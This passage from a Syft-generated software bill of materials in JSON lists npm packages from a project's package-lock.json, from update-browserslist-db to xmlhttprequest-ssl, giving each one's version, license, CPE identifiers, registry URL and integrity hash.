cpe:2.3:a:update_browserslist_db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update-browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update-browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update_browserslist:update-browserslist-db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update_browserslist:update_browserslist_db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update:update-browserslist-db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update:update_browserslist_db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/update-browserslist-db@1.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.2.3.tgz","integrity":"sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w==","dependencies":{"escalade":"^3.2.0","picocolors":"^1.1.1"}}},{"id":"aac5900c84ec45ff","name":"util-deprecate","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:util-deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:util-deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:util_deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:util_deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:util:util-deprecate:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:util:util_deprecate:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/util-deprecate@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz","integrity":"sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==","dependencies":null}},{"id":"4f715b1e9b38109a","name":"utils-merge","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:utils-merge:utils-merge:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:utils-merge:utils_merge:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:utils_merge:utils-merge:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:utils_merge:utils_merge:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:utils:utils-merge:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:utils:utils_merge:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/utils-merge@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz","integrity":"sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==","dependencies":null}},{"id":"21b622d3d64a2c86","name":"uuid","version":"10.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:uuid:uuid:10.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/uuid@10.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz","integrity":"sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ==","dependencies":null}},{"id":"8cf0c19ede45d1bc","name":"uuid","version":"8.3.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:uuid:uuid:8.3.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/uuid@8.3.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz","integrity":"sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==","dependencies":null}},{"id":"0bd59342bab05265","name":"uuid","version":"9.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:uuid:uuid:9.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/uuid@9.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz","integrity":"sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==","dependencies":null}},{"id":"2fc27b955ce3ef5d","name":"vary","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:vary:vary:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/vary@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/vary/-/vary-1.1.2.tgz","integrity":"sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==","dependencies":null}},{"id":"14c55cee8eb4e77f","name":"victory-vendor","version":"36.9.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT AND ISC","spdxExpression":"MIT AND ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:victory-vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:victory-vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:victory_vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:victory_vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:victory:victory-vendor:36.9.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:victory:victory_vendor:36.9.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/victory-vendor@36.9.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/victory-vendor/-/victory-vendor-36.9.2.tgz","integrity":"sha512-PnpQQMuxlwYdocC8fIJqVXvkeViHYzotI+NJrCuav0ZYFoq912ZHBk3mCeuj+5/VpodOjPe1z0Fk2ihgzlXqjQ==","dependencies":{"@types/d3-array":"^3.0.3","@types/d3-ease":"^3.0.0","@types/d3-interpolate":"^3.0.1","@types/d3-scale":"^4.0.2","@types/d3-shape":"^3.1.0","@types/d3-time":"^3.0.0","@types/d3-timer":"^3.0.0","d3-array":"^3.1.6","d3-ease":"^3.0.1","d3-interpolate":"^3.0.1","d3-scale":"^4.0.2","d3-shape":"^3.1.0","d3-time":"^3.0.0","d3-timer":"^3.0.1"}}},{"id":"874d0721c00b1770","name":"vite-compatible-readable-stream","version":"3.6.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:vite-compatible-readable-stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite-compatible-readable-stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite_compatible_readable_stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite_compatible_readable_stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite-compatible-readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite-compatible-readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite_compatible_readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite_compatible_readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite-compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite-compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite_compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite_compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:vite:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/vite-compatible-readable-stream@3.6.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz","integrity":"sha512-t20zYkrSf868+j/p31cRIGN28Phrjm3nRSLR2fyc2tiWi4cZGVdv68yNlwnIINTkMTmPoMiSlc0OadaO7DXZaQ==","dependencies":{"inherits":"^2.0.3","string_decoder":"^1.1.1","util-deprecate":"^1.0.1"}}},{"id":"770e2f7ad3b1c524","name":"webidl-conversions","version":"3.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-2-Clause","spdxExpression":"BSD-2-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:webidl-conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:webidl-conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:webidl_conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:webidl_conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:webidl:webidl-conversions:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:webidl:webidl_conversions:3.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/webidl-conversions@3.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz","integrity":"sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==","dependencies":null}},{"id":"944bd0667b1458ca","name":"websocket-driver","version":"0.7.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:websocket-driver:websocket-driver:0.7.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:websocket-driver:websocket_driver:0.7.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:websocket_driver:websocket-driver:0.7.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:websocket_driver:websocket_driver:0.7.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:websocket:websocket-driver:0.7.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:websocket:websocket_driver:0.7.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/websocket-driver@0.7.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz","integrity":"sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg==","dependencies":{"http-parser-js":">=0.5.1","safe-buffer":">=5.1.0","websocket-extensions":">=0.1.1"}}},{"id":"6844e064384011a8","name":"websocket-extensions","version":"0.1.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:websocket-extensions_project:websocket-extensions:0.1.4:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/websocket-extensions@0.1.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz","integrity":"sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg==","dependencies":null}},{"id":"0827d54a7a5ea1e5","name":"whatwg-url","version":"5.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:whatwg-url:whatwg-url:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:whatwg-url:whatwg_url:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:whatwg_url:whatwg-url:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:whatwg_url:whatwg_url:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:whatwg:whatwg-url:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:whatwg:whatwg_url:5.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/whatwg-url@5.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz","integrity":"sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==","dependencies":{"tr46":"~0.0.3","webidl-conversions":"^3.0.0"}}},{"id":"414763db2a64d1aa","name":"which","version":"2.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:which:which:2.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/which@2.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/which/-/which-2.0.2.tgz","integrity":"sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==","dependencies":{"isexe":"^2.0.0"}}},{"id":"e9c9cc83bf436fd2","name":"which-module","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:which-module:which-module:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:which-module:which_module:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:which_module:which-module:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:which_module:which_module:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:which:which-module:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:which:which_module:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/which-module@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/which-module/-/which-module-2.0.1.tgz","integrity":"sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ==","dependencies":null}},{"id":"1fadca0371d5cfaf","name":"wrap-ansi","version":"6.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:wrap-ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap-ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap_ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap_ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap:wrap-ansi:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap:wrap_ansi:6.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/wrap-ansi@6.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz","integrity":"sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==","dependencies":{"ansi-styles":"^4.0.0","string-width":"^4.1.0","strip-ansi":"^6.0.0"}}},{"id":"336621830c576ca4","name":"wrap-ansi","version":"7.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:wrap-ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap-ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap_ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap_ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap:wrap-ansi:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap:wrap_ansi:7.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/wrap-ansi@7.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz","integrity":"sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==","dependencies":{"ansi-styles":"^4.0.0","string-width":"^4.1.0","strip-ansi":"^6.0.0"}}},{"id":"49a7c54fcd626265","name":"wrap-ansi","version":"8.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:wrap-ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap-ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap_ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap_ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap:wrap-ansi:8.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:wrap:wrap_ansi:8.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/wrap-ansi@8.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz","integrity":"sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==","dependencies":{"ansi-styles":"^6.1.0","string-width":"^5.0.1","strip-ansi":"^7.0.1"}}},{"id":"3d054461229ae629","name":"wrappy","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:wrappy:wrappy:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/wrappy@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz","integrity":"sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==","dependencies":null}},{"id":"20d4f853542f41c9","name":"ws","version":"8.18.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ws_project:ws:8.18.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/ws@8.18.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ws/-/ws-8.18.3.tgz","integrity":"sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==","dependencies":null}},{"id":"0872acd31442749a","name":"xmlbuilder","version":"13.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:xmlbuilder:xmlbuilder:13.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/xmlbuilder@13.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-13.0.2.tgz","integrity":"sha512-Eux0i2QdDYKbdbA6AM6xE4m6ZTZr4G4xF9kahI2ukSEMCzwce2eX9WlTI5J3s+NU7hpasFsr8hWIONae7LluAQ==","dependencies":null}},{"id":"9551f10f27f0ee2d","name":"xmlhttprequest-ssl","version":"2.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:xmlhttprequest:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:xmlhttprequest:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/xmlhttprequest-s